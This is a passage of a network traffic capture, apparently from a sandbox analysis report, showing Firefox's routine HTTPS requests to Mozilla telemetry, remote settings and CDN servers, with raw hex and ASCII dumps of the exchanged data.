2024-07-26 18:11:03 UTC	1390	IN	Data Raw: 7b a2 9b 95 a7 9e 7f 58 bd e4 58 80 fe c8 b3 f3 d3 6b 49 71 c2 48 82 9f 7e 72 9a 21 e7 82 fa fb 2c af 88 93 da c8 13 3e a1 c5 ba ef 33 92 cf 3d e9 21 e7 f4 92 a9 50 82 d0 83 7d c0 19 35 e2 34 fd 49 dd 92 43 d3 e7 a4 9e 7c 80 6f 04 c6 fb 55 ab fe f3 41 ac 6f 6b bc f7 9d 28 d5 d5 a8 00 b8 f6 13 b0 ed 38 3c a5 3b 9e 9c df 7e 2b 26 f0 61 ac a2 3d de eb 42 64 70 ff ad dd 38 d6 e4 23 57 14 ea 20 24 a8 26 ec 36 8c d5 38 8e 1a aa 82 be 8b 4f b6 7f d0 6c 08 ec 34 78 d7 44 f8 57 6d ff 16 fa 6a 7e fe ed cb 5b 27 89 33 25 aa 1c 85 ef 36 37 75 e1 6f ff 0b 06 ba c1 3a 00 c6 01 cc 33 83 83 a7 a3 63 57 bb c9 f2 25 ea dd 0a af ad 62 e5 72 dd 74 a8 6f b9 f2 f5 f7 49 13 5c f3 10 e7 88 14 89 93 dd bb d3 32 61 60 18 8c 66 9c fa 99 87 e0 51 f3 fa 69 01 db 44 92 02 89 62 97 58 Data Ascii: {XXkIqH~r!,>3=!P}54IC\|oUAok(8<;~+&a=Bdp8#W $&68Ol4xDWmj~['3%67uo:3cW%brtoI\2a`fQiDbX
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: 74 57 c9 cf 62 af 2d 93 e4 fb be f9 01 86 86 71 52 46 93 1a 03 ca 9c a8 a1 81 e3 47 d7 8a 64 b9 93 a4 85 62 45 fc 44 d7 ea 82 dd b6 b2 3e 6b ab 9c 3b 00 78 ea e2 0d 0f 00 eb 00 c0 ec 5c ae e3 08 bd a0 83 69 27 eb 7d e6 e6 21 00 fc 22 8f fb 2f 39 30 65 41 4e b9 09 6b bd 85 14 80 2d c4 0f c7 64 5f d4 20 9a 8a 3a a3 8d 3e a7 fc 3a 7d fd fe db 36 13 21 29 9e 95 c2 b6 8b 00 f8 70 63 99 4f 68 51 60 44 69 f0 92 92 80 ef 32 8e b7 60 20 f9 e0 17 a8 8e 8a e5 6f 22 c1 b5 47 ab 9a 0c 7e d7 e3 67 c2 cd 55 77 0d fe 2d b1 ea 8e 78 ef f2 70 dd e0 85 1d d8 df d2 2d ed 47 d7 55 84 eb 1e 46 48 db f4 b2 9a 48 ef c1 fd 4b a0 e7 22 8e 5c a9 5e 30 3d 02 53 8d 31 ef bb c6 28 2d 72 e9 55 86 e0 2b eb 3e 81 9e ea a2 99 53 53 27 bb e5 c8 e5 59 4a 75 d2 04 f7 be 94 2c 18 18 c2 be 74 Data Ascii: tWb-qRFGdbED>k;x\i'}!"/90eANk-d_ :>:}6!)pcOhQ`Di2` o"G~gUw-xp-GUFHHK"\^0=S1(-rU+>SS'YJu,t
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: d5 56 c7 07 5c 5a f7 27 e8 2b 87 e1 ee e1 b2 13 91 93 5d b6 4a a4 b9 9e 5e 39 12 65 8e 54 96 2b 96 a2 b4 6b a7 48 b9 43 ee bd 59 a4 4c 93 79 e6 28 3c 11 00 e9 4a c5 fa c0 10 40 84 3e 3c 04 c3 83 7b 3e fa 68 85 48 94 2c 57 64 79 a8 f2 c5 1e 7b c5 1e 05 2e e2 3d 32 55 96 44 91 8e a8 69 b2 eb 72 2f 1f ea 6a 39 96 3e af fe ec c8 52 cc d3 16 e5 c7 b6 a5 b0 ce ed 1b b6 2e 07 ec 5d 19 6c 04 28 ac 42 72 ac e9 85 0f 12 f3 3c fe b2 41 3d 27 5f b3 70 1f ca 66 d5 4b 0e 23 6b d0 cc db 17 3c 3b a3 ce 02 b1 e9 c7 95 1f af 51 cc ca 91 cd ce 13 7f b4 3a 29 ef 94 91 2f f2 91 55 36 7e 75 f5 11 0b 1f ae 2c 56 7c 91 ec 35 3b 5f f9 d5 4e df cf 37 1c 6b a4 71 b0 84 1c 00 cd 5b 21 7a 87 b6 db 9b ff 72 71 ae 57 ad 5e 57 bd 48 71 2f 42 75 7a 9e f6 f1 a9 ed 38 fb 65 4d 0c bf 80 61 Data Ascii: V\Z'+]J^9eT+kHCYLy(<J@><{>hH,Wdy{.=2UDir/j9>R.]l(Br<A='_pfK#k<;Q:)/U6~u,V\|5;_N7kq[!zrqW^WHq/Buz8eMa
2024-07-26 18:11:03 UTC	756	IN	Data Raw: 87 59 c0 6c c5 35 44 1b 67 72 bc 60 86 86 0f 7f fa f5 8a 89 6e 29 72 49 86 a7 0c 85 ff eb 44 ee 1b a4 ee 49 13 27 ad 9c 24 dd e8 ee 99 2a f7 cc 51 a9 77 ba ba e4 ab 54 ab 5c 5c 8b 3f f9 1c fa 4c 68 0e be 1d d6 de 8c 45 61 91 3b f5 9a b0 8e fe c9 11 25 fb 07 bb a3 e9 b1 dc 3d 0e 3b 66 d4 66 b5 5b 3d 33 c6 fc f1 ea 00 45 db e1 19 df 6c ec d4 52 c9 91 be 5a 7b c3 c7 a8 bb 8f b8 8d 11 fc c6 04 6a e3 82 66 a4 fe b4 dd 5b 70 b8 c9 10 57 76 10 63 58 69 8b 89 06 be 14 32 78 ab 72 be 9b 62 b5 ab c7 76 b9 32 4b e9 99 af f4 c8 13 8b 72 5d 26 ed 95 48 f7 2b 7d 72 45 9e a9 ee f2 5d 9e de 3b 95 9a f8 09 13 36 bf f8 02 ae 95 0e 9b 79 f2 a2 f8 35 45 96 1b d3 b3 cd 39 3e 73 63 c2 96 7f 0c 00 ca 86 81 73 2c c4 c1 b8 32 35 8c 4a d9 70 2c c8 f2 14 c4 8c 2c a5 d9 2c c0 89 34 Data Ascii: Yl5Dgr`n)rIDI'$*QwT\\?LhEa;%=;ff[=3ElRZ{jf[pWvcXi2xrbv2Kr]&H+}rE];6y5E9>scs,25Jp,,,4

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.5	64242	34.120.208.123	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:03 UTC	618	OUT	POST /submit/firefox-desktop/newtab/1/b8f053a5-de16-4a2c-8120-1ab4aadd63e8 HTTP/1.1 Host: incoming.telemetry.mozilla.org User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br content-type: application/json; charset=utf-8 content-encoding: gzip content-length: 991 date: Fri, 26 Jul 2024 19:27:31 GMT x-telemetry-agent: Glean/53.2.0 (Rust on Windows) Connection: keep-alive Sec-Fetch-Dest: empty Sec-Fetch-Mode: no-cors Sec-Fetch-Site: none Pragma: no-cache Cache-Control: no-cache
2024-07-26 18:11:03 UTC	991	OUT	Data Raw: 1f 8b 08 00 00 00 00 00 00 ff d5 56 db 6e dc 36 10 fd 95 42 af 59 2e 48 89 ba ed 1f f4 b9 29 fa 10 04 02 2f a3 35 11 2d a9 90 94 93 ad e1 7f ef 50 92 f7 62 2f 1c 20 31 5a 17 10 04 89 73 3b 73 38 33 e4 43 36 1a bb ef 8c ed 5d b6 7b c8 02 7c cd 76 7c 93 85 28 7c ec a2 39 40 b6 cb 72 9a 17 84 51 42 f9 47 c6 77 9c 7e a0 6c 47 69 b6 c9 c0 ea 1f ea 78 10 c1 59 d4 b0 f0 2d 0a d9 05 08 c1 38 db a1 6d f2 f0 7d 04 8f 1e 6c 0c 29 bc 0a f7 c4 1c 46 e7 23 f1 30 a0 25 10 ef 86 c1 4d 31 49 a5 17 56 dd a1 2b b0 42 0e 40 ce da b3 a7 e8 45 d2 8a c7 31 01 b2 e6 20 a7 70 32 4f 60 d3 77 0a f5 bb 46 79 21 45 c5 5b a9 88 04 5e 13 2e db 9c 34 75 95 93 9c 29 21 cb 5a 6a 51 c8 ec f1 11 a9 00 3f 12 a1 49 44 40 07 88 fe 78 13 92 72 36 e2 fa 25 90 67 01 79 2f cb b6 95 35 c9 65 0f 84 Data Ascii: Vn6BY.H)/5-Pb/ 1Zs;s83C6]{\|v\|(\|9@rQBGw~lGixY-8m}l)F#0%M1IV+B@E1 p2O`wFy!E[^.4u)!ZjQ?ID@xr6%gy/5e
2024-07-26 18:11:03 UTC	662	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 26 Jul 2024 18:11:03 GMT Content-Type: text/plain; charset=utf-8 Vary: Accept-Encoding Strict-Transport-Security: max-age=31536000 X-Frame-Options: DENY Access-Control-Allow-Methods: GET, POST, PUT, OPTIONS Access-Control-Max-Age: 1728000 Access-Control-Allow-Headers: Accept-Encoding,Connection,Content-Encoding,Content-Length,Content-Type,DNT,Date,Sec-Fetch-Dest,Sec-Fetch-Mode,Sec-Fetch-Site,User-Agent,X-Client-Type,X-Client-Version,X-Debug-ID,X-Forwarded-For,X-Pingsender-Version,X-Pipeline-Proxy,X-Source-Tags,X-Telemetry-Agent Via: 1.1 google Content-Length: 0 Alt-Svc: clear Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.5	64243	34.149.100.209	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:03 UTC	266	OUT	GET /v1/ HTTP/1.1 Host: firefox.settings.services.mozilla.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:03 UTC	509	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 939 Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Alert, Content-Type, Content-Length, Backoff, Retry-After X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none'; Strict-Transport-Security: max-age=31536000 Via: 1.1 google Date: Fri, 26 Jul 2024 17:55:32 GMT Age: 931 Content-Type: application/json Cache-Control: public,max-age=3600 Alt-Svc: clear Connection: close
2024-07-26 18:11:03 UTC	881	IN	Data Raw: 7b 22 70 72 6f 6a 65 63 74 5f 6e 61 6d 65 22 3a 22 52 65 6d 6f 74 65 20 53 65 74 74 69 6e 67 73 20 50 52 4f 44 22 2c 22 70 72 6f 6a 65 63 74 5f 76 65 72 73 69 6f 6e 22 3a 22 31 38 2e 31 2e 31 22 2c 22 68 74 74 70 5f 61 70 69 5f 76 65 72 73 69 6f 6e 22 3a 22 31 2e 32 32 22 2c 22 70 72 6f 6a 65 63 74 5f 64 6f 63 73 22 3a 22 68 74 74 70 73 3a 2f 2f 72 65 6d 6f 74 65 2d 73 65 74 74 69 6e 67 73 2e 72 65 61 64 74 68 65 64 6f 63 73 2e 69 6f 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2e 73 65 74 74 69 6e 67 73 2e 73 65 72 76 69 63 65 73 2e 6d 6f 7a 69 6c 6c 61 2e 63 6f 6d 2f 76 31 2f 22 2c 22 73 65 74 74 69 6e 67 73 22 3a 7b 22 72 65 61 64 6f 6e 6c 79 22 3a 74 72 75 65 2c 22 62 61 74 63 68 5f 6d 61 78 5f 72 65 71 75 65 73 74 73 22 3a Data Ascii: {"project_name":"Remote Settings PROD","project_version":"18.1.1","http_api_version":"1.22","project_docs":"https://remote-settings.readthedocs.io","url":"https://firefox.settings.services.mozilla.com/v1/","settings":{"readonly":true,"batch_max_requests":
2024-07-26 18:11:03 UTC	58	IN	Data Raw: 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2d 73 65 74 74 69 6e 67 73 2d 61 74 74 61 63 68 6d 65 6e 74 73 2e 63 64 6e 2e 6d 6f 7a 69 6c 6c 61 2e 6e 65 74 2f 22 7d 7d 7d Data Ascii: "https://firefox-settings-attachments.cdn.mozilla.net/"}}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.5	64247	34.117.121.53	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:03 UTC	334	OUT	GET /main-workspace/quicksuggest/3012260d-8f8d-4863-9be6-03970e37af68 HTTP/1.1 Host: firefox-settings-attachments.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:03 UTC	688	IN	HTTP/1.1 200 OK x-goog-generation: 1721840736746101 x-goog-metageneration: 1 x-goog-stored-content-encoding: identity x-goog-stored-content-length: 4932 x-goog-hash: crc32c=ACggkw== x-goog-hash: md5=rvHDGplKD+x03W1hpQ9GvA== x-goog-storage-class: STANDARD Accept-Ranges: bytes Content-Length: 4932 X-GUploader-UploadID: AHxI1nOcN2vEUkXl15DEsro0hI3zbLKDUxVDuka5qUe36YWhx3isKl6qZXe8x7uMg41Pz7cPxMA-o93nZw Server: UploadServer Date: Wed, 24 Jul 2024 17:30:08 GMT Cache-Control: public,max-age=604800 Last-Modified: Wed, 24 Jul 2024 17:05:36 GMT ETag: "aef1c31a994a0fec74dd6d61a50f46bc" Content-Type: application/octet-stream Age: 175255 Alt-Svc: clear Connection: close
2024-07-26 18:11:03 UTC	702	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c8 00 00 00 c8 08 03 00 00 00 9a 86 5e ac 00 00 00 78 50 4c 54 45 2f 29 2b fd fd fd ff b3 2a f9 b4 1f ff fe ff fd b3 20 2d 28 29 ff ff ff fe ff ff 30 2a 2c fe ff fa 20 1b 1d fb ff ff 31 2c 2e fc b1 1a 2a 25 27 fa af 12 fb b3 25 25 21 22 fb fa f4 fc f5 e3 69 67 68 f6 c3 55 f9 eb c9 f8 d7 8f 3e 3b 3c f8 bd 3f f8 b8 31 5a 57 58 f1 f0 f0 bc ba bb f6 cd 71 f8 e1 ac ce cc cd a6 a4 a5 4c 49 4a 8f 8d 8e 7c 7a 7a dd dc dc e7 e6 e7 6e 01 c1 36 00 00 12 87 49 44 41 54 78 da ec 5c 0b 7b 9b 3a 12 45 37 8a 90 2c 2b 72 44 9d 94 06 e8 e5 fd ff ff e1 ce 8c 64 8c 63 b9 f1 b7 ee 16 ba 1f 6c 5d fb 36 8f d5 61 ce bc 67 48 d2 ff 93 2b d9 80 6c 40 36 20 1b 90 0d c8 06 64 03 b2 01 d9 80 6c 40 36 20 1b 90 0d c8 06 64 03 b2 Data Ascii: PNGIHDR^xPLTE/)+* -()0, 1,.%'%%!"ighU>;<?1ZWXqLIJ\|zzn6IDATx\{:E7,+rDdcl]6agH+l@6 dl@6 d
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: 9d 36 d7 94 f1 28 48 0e 89 c7 02 b6 4c 5c 03 31 26 d1 47 1e 12 e0 65 43 94 da da 88 ff 23 3e 61 a4 42 50 02 bd 22 d6 0c 2d 9c ad 57 60 b5 78 56 68 ba e3 31 d3 44 ba 61 2d 89 c2 4c 6a ff c9 af 80 5f ec 57 a0 23 b2 d1 42 24 d7 40 14 3a 0c 4c 48 94 c9 0d 04 ef 0e 1c 47 12 d3 11 10 99 cd c7 c5 81 30 d6 3a 93 44 43 2b e5 74 7e 84 9c 70 1c 87 ba e9 73 e7 4c dc 41 c2 cb 55 4b 53 0b 22 45 7d 69 8c 28 86 42 a7 68 21 50 1f 43 a6 02 d7 d8 e4 3a 2e 91 84 b8 b5 28 10 8c 16 8f 5a 79 fb 34 9d 8a 14 41 39 d5 65 98 6f 9c be 77 9f 8e c7 98 75 c3 50 40 e9 82 2d 4d ad c1 58 52 61 35 37 bb f0 0f ce 54 9c 5f 24 1a 32 cd 10 49 c4 65 82 92 98 72 59 20 32 6d 34 c5 55 62 4e 2d 70 e0 d6 d4 a7 ea d6 e4 38 99 2c db 6b cf 49 71 99 70 f5 c2 12 e1 c8 2c 35 57 76 ef c7 5d c3 30 28 9e 49 Data Ascii: 6(HL\1&GeC#>aBP"-W`xVh1Da-Lj_W#B$@:LHG0:DC+t~psLAUKS"E}i(Bh!PC:.(Zy4A9eowuP@-MXRa57T_$2IerY 2m4UbN-p8,kIqp,5Wv]0(I
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: e9 11 89 8c f9 0d ab a5 dc f5 d4 a8 64 18 07 c4 8c 83 1f a1 07 0b 91 b2 65 cc 6f 1a 19 ec 0b 7e 01 7c bb 94 d3 c6 b7 4f 74 3b 2d 92 db 3b 64 58 78 19 16 d1 11 9c f4 8b fb 69 d2 5d 53 4f 5d 45 9c 22 92 ac c3 f2 70 f2 8b 1d b2 f9 dc dd 9f b5 5a 32 bd 11 39 e1 30 b6 c3 dd 29 1c fc a5 56 16 1f c8 60 fd 62 ab 0f 6c 9d d5 dd 03 1e f1 a1 4a 63 e5 6e b8 05 90 89 33 dd c8 c3 fa ea d8 61 f7 04 fb 0a ea f6 12 19 90 2b 1e a3 fd ef 43 14 4c 93 ae 53 5d 43 2f 05 37 38 ef ab 7a a0 01 7f 6d 43 1b f4 f6 12 19 44 cd 20 c6 81 2d 02 04 43 8e a8 9f a6 35 a4 84 76 2d 20 60 c1 37 e5 a7 e0 93 5f 50 2b 89 67 64 7f c0 b3 e3 40 b9 8d b8 b7 70 7f c9 a3 88 f0 c1 f7 10 93 5f 62 c1 75 ab 61 01 89 c4 c3 72 df c6 05 11 c0 2d 0e 66 2a 2c 8d 89 2f 50 e0 77 fc f7 33 f2 8f 55 e3 21 d9 55 c9 Data Ascii: deo~\|Ot;-;dXxi]SO]E"pZ290)V`blJcn3a+CLS]C/78zmCD -C5v- `7_P+gd@p_buar-f*,/Pw3U!U
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: 45 96 16 e3 16 eb a6 c4 07 28 eb 36 55 42 fc 1f 80 04 f9 85 28 4f d3 3a ec e3 32 ee 20 1a 14 ca 96 a1 25 69 a9 a0 5e d7 9f a0 df 48 92 f5 62 51 50 1b fb 9a 18 93 1b 32 cc 8e f3 60 bc 7b 7f 6a 31 73 90 c2 b1 aa ba e7 b5 46 26 f6 88 92 b5 79 73 67 81 3c fa 3f 5a 89 3a 8c a8 31 e4 66 41 dd 23 2c fb 60 d8 13 30 6a 8c 8f 3e 67 a8 0f 1b fa d0 3f f3 36 a5 5e 85 c9 4b 4d e0 43 a4 68 7a 5a 3d 55 fb 61 1e 57 7a 14 5c 7b 40 fd c7 61 b5 3c f6 cf ae f0 9b 0e 31 54 33 97 c4 dc 64 dd 2b 96 ca 6b 46 66 31 8d 25 2f ad bd 90 1e 4f ec bc d7 c7 fd 5c 3b 93 e1 89 10 73 6c 11 0d 23 48 13 4a 5e ba bc 55 fa f1 c9 4a 66 0d e6 4b 40 3c cd 3f c5 11 b6 8d 2c ce b8 a4 05 71 89 2c c4 ca 0b 37 c1 a7 01 62 bf f0 4c cf 4f 85 ed a3 fc fa 69 10 bd 65 2b 18 0d 51 e0 32 b8 e0 0d ba 91 66 54 Data Ascii: E(6UB(O:2 %i^HbQP2`{j1sF&ysg<?Z:1fA#,`0j>g?6^KMChzZ=UaWz\{@a<1T3d+kFf1%/O\;sl#HJ^UJfK@<?,q,7bLOie+Q2fT
2024-07-26 18:11:03 UTC	60	IN	Data Raw: 72 01 b9 80 5c 40 2e 20 17 90 0b c8 05 e4 02 72 01 b9 80 5c 40 2e 20 17 90 0b c8 05 e4 02 72 01 b9 80 5c 40 4e 1f ff 02 58 30 62 ce 41 c1 03 24 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: r\@. r\@. r\@NX0bA$IENDB`

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.5	64246	34.149.100.209	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:03 UTC	266	OUT	GET /v1/ HTTP/1.1 Host: firefox.settings.services.mozilla.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:03 UTC	509	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 939 Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Alert, Content-Type, Content-Length, Backoff, Retry-After X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none'; Strict-Transport-Security: max-age=31536000 Via: 1.1 google Date: Fri, 26 Jul 2024 17:55:32 GMT Age: 931 Content-Type: application/json Cache-Control: public,max-age=3600 Alt-Svc: clear Connection: close
2024-07-26 18:11:03 UTC	881	IN	Data Raw: 7b 22 70 72 6f 6a 65 63 74 5f 6e 61 6d 65 22 3a 22 52 65 6d 6f 74 65 20 53 65 74 74 69 6e 67 73 20 50 52 4f 44 22 2c 22 70 72 6f 6a 65 63 74 5f 76 65 72 73 69 6f 6e 22 3a 22 31 38 2e 31 2e 31 22 2c 22 68 74 74 70 5f 61 70 69 5f 76 65 72 73 69 6f 6e 22 3a 22 31 2e 32 32 22 2c 22 70 72 6f 6a 65 63 74 5f 64 6f 63 73 22 3a 22 68 74 74 70 73 3a 2f 2f 72 65 6d 6f 74 65 2d 73 65 74 74 69 6e 67 73 2e 72 65 61 64 74 68 65 64 6f 63 73 2e 69 6f 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2e 73 65 74 74 69 6e 67 73 2e 73 65 72 76 69 63 65 73 2e 6d 6f 7a 69 6c 6c 61 2e 63 6f 6d 2f 76 31 2f 22 2c 22 73 65 74 74 69 6e 67 73 22 3a 7b 22 72 65 61 64 6f 6e 6c 79 22 3a 74 72 75 65 2c 22 62 61 74 63 68 5f 6d 61 78 5f 72 65 71 75 65 73 74 73 22 3a Data Ascii: {"project_name":"Remote Settings PROD","project_version":"18.1.1","http_api_version":"1.22","project_docs":"https://remote-settings.readthedocs.io","url":"https://firefox.settings.services.mozilla.com/v1/","settings":{"readonly":true,"batch_max_requests":
2024-07-26 18:11:03 UTC	58	IN	Data Raw: 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2d 73 65 74 74 69 6e 67 73 2d 61 74 74 61 63 68 6d 65 6e 74 73 2e 63 64 6e 2e 6d 6f 7a 69 6c 6c 61 2e 6e 65 74 2f 22 7d 7d 7d Data Ascii: "https://firefox-settings-attachments.cdn.mozilla.net/"}}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.5	64249	34.149.100.209	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:03 UTC	266	OUT	GET /v1/ HTTP/1.1 Host: firefox.settings.services.mozilla.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:03 UTC	509	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 939 Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Alert, Content-Type, Content-Length, Backoff, Retry-After X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none'; Strict-Transport-Security: max-age=31536000 Via: 1.1 google Date: Fri, 26 Jul 2024 17:55:32 GMT Age: 931 Content-Type: application/json Cache-Control: public,max-age=3600 Alt-Svc: clear Connection: close
2024-07-26 18:11:03 UTC	881	IN	Data Raw: 7b 22 70 72 6f 6a 65 63 74 5f 6e 61 6d 65 22 3a 22 52 65 6d 6f 74 65 20 53 65 74 74 69 6e 67 73 20 50 52 4f 44 22 2c 22 70 72 6f 6a 65 63 74 5f 76 65 72 73 69 6f 6e 22 3a 22 31 38 2e 31 2e 31 22 2c 22 68 74 74 70 5f 61 70 69 5f 76 65 72 73 69 6f 6e 22 3a 22 31 2e 32 32 22 2c 22 70 72 6f 6a 65 63 74 5f 64 6f 63 73 22 3a 22 68 74 74 70 73 3a 2f 2f 72 65 6d 6f 74 65 2d 73 65 74 74 69 6e 67 73 2e 72 65 61 64 74 68 65 64 6f 63 73 2e 69 6f 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2e 73 65 74 74 69 6e 67 73 2e 73 65 72 76 69 63 65 73 2e 6d 6f 7a 69 6c 6c 61 2e 63 6f 6d 2f 76 31 2f 22 2c 22 73 65 74 74 69 6e 67 73 22 3a 7b 22 72 65 61 64 6f 6e 6c 79 22 3a 74 72 75 65 2c 22 62 61 74 63 68 5f 6d 61 78 5f 72 65 71 75 65 73 74 73 22 3a Data Ascii: {"project_name":"Remote Settings PROD","project_version":"18.1.1","http_api_version":"1.22","project_docs":"https://remote-settings.readthedocs.io","url":"https://firefox.settings.services.mozilla.com/v1/","settings":{"readonly":true,"batch_max_requests":
2024-07-26 18:11:03 UTC	58	IN	Data Raw: 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2d 73 65 74 74 69 6e 67 73 2d 61 74 74 61 63 68 6d 65 6e 74 73 2e 63 64 6e 2e 6d 6f 7a 69 6c 6c 61 2e 6e 65 74 2f 22 7d 7d 7d Data Ascii: "https://firefox-settings-attachments.cdn.mozilla.net/"}}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.5	64248	34.149.100.209	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:03 UTC	266	OUT	GET /v1/ HTTP/1.1 Host: firefox.settings.services.mozilla.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:03 UTC	510	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 939 Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Alert, Content-Type, Content-Length, Backoff, Retry-After X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none'; Strict-Transport-Security: max-age=31536000 Via: 1.1 google Date: Fri, 26 Jul 2024 17:27:33 GMT Age: 2610 Content-Type: application/json Cache-Control: public,max-age=3600 Alt-Svc: clear Connection: close
2024-07-26 18:11:03 UTC	880	IN	Data Raw: 7b 22 70 72 6f 6a 65 63 74 5f 6e 61 6d 65 22 3a 22 52 65 6d 6f 74 65 20 53 65 74 74 69 6e 67 73 20 50 52 4f 44 22 2c 22 70 72 6f 6a 65 63 74 5f 76 65 72 73 69 6f 6e 22 3a 22 31 38 2e 31 2e 31 22 2c 22 68 74 74 70 5f 61 70 69 5f 76 65 72 73 69 6f 6e 22 3a 22 31 2e 32 32 22 2c 22 70 72 6f 6a 65 63 74 5f 64 6f 63 73 22 3a 22 68 74 74 70 73 3a 2f 2f 72 65 6d 6f 74 65 2d 73 65 74 74 69 6e 67 73 2e 72 65 61 64 74 68 65 64 6f 63 73 2e 69 6f 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2e 73 65 74 74 69 6e 67 73 2e 73 65 72 76 69 63 65 73 2e 6d 6f 7a 69 6c 6c 61 2e 63 6f 6d 2f 76 31 2f 22 2c 22 73 65 74 74 69 6e 67 73 22 3a 7b 22 72 65 61 64 6f 6e 6c 79 22 3a 74 72 75 65 2c 22 62 61 74 63 68 5f 6d 61 78 5f 72 65 71 75 65 73 74 73 22 3a Data Ascii: {"project_name":"Remote Settings PROD","project_version":"18.1.1","http_api_version":"1.22","project_docs":"https://remote-settings.readthedocs.io","url":"https://firefox.settings.services.mozilla.com/v1/","settings":{"readonly":true,"batch_max_requests":
2024-07-26 18:11:03 UTC	59	IN	Data Raw: 3a 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2d 73 65 74 74 69 6e 67 73 2d 61 74 74 61 63 68 6d 65 6e 74 73 2e 63 64 6e 2e 6d 6f 7a 69 6c 6c 61 2e 6e 65 74 2f 22 7d 7d 7d Data Ascii: :"https://firefox-settings-attachments.cdn.mozilla.net/"}}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.5	64250	34.149.100.209	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:03 UTC	266	OUT	GET /v1/ HTTP/1.1 Host: firefox.settings.services.mozilla.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:03 UTC	509	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 939 Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Alert, Content-Type, Content-Length, Backoff, Retry-After X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none'; Strict-Transport-Security: max-age=31536000 Via: 1.1 google Date: Fri, 26 Jul 2024 17:55:32 GMT Age: 931 Content-Type: application/json Cache-Control: public,max-age=3600 Alt-Svc: clear Connection: close
